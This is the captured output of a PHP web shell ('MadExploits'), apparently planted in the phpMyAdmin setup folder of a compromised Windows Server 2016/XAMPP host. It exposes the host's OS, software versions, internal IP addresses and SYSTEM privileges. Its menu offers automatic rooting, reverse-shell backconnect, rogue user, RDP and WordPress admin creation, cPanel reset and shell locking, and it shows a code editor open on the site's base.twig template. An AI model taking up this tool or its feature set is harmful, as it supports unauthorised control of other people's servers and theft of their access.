Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
setup /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxrwxrwx
form
[ DIR ]
drwxrwxrwx
home
[ DIR ]
drwxrwxrwx
servers
[ DIR ]
drwxrwxrwx
base.twig
1.37
KB
-rw-rw-rw-
error.twig
494
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.twig
<!doctype html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8"> <title>phpMyAdmin setup</title> <link href="../favicon.ico" rel="icon" type="image/x-icon"> <link href="../favicon.ico" rel="shortcut icon" type="image/x-icon"> <link href="styles.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/vendor/jquery/jquery.min.js"></script> <script type="text/javascript" src="../js/vendor/jquery/jquery-ui.min.js"></script> <script type="text/javascript" src="../js/setup/ajax.js"></script> <script type="text/javascript" src="../js/config.js"></script> <script type="text/javascript" src="../js/setup/scripts.js"></script> <script type="text/javascript" src="../js/messages.php"></script> </head> <body> <h1> <span class="blue">php</span><span class="orange">MyAdmin</span> setup </h1> <div id="menu"> <ul> <li> <a href="index.php{{ get_common() }}"{{ formset is empty ? ' class="active"' }}> {% trans 'Overview' %} </a> </li> {% for page in pages %} <li> <a href="index.php{{ get_common({ 'page': 'form', 'formset': page.formset }) }}"{{ formset == page.formset ? ' class="active"' }}> {{ page.name }} </a> </li> {% endfor %} </ul> </div> <div id="page"> {% block content %}{% endblock %} </div> </body> </html>
Close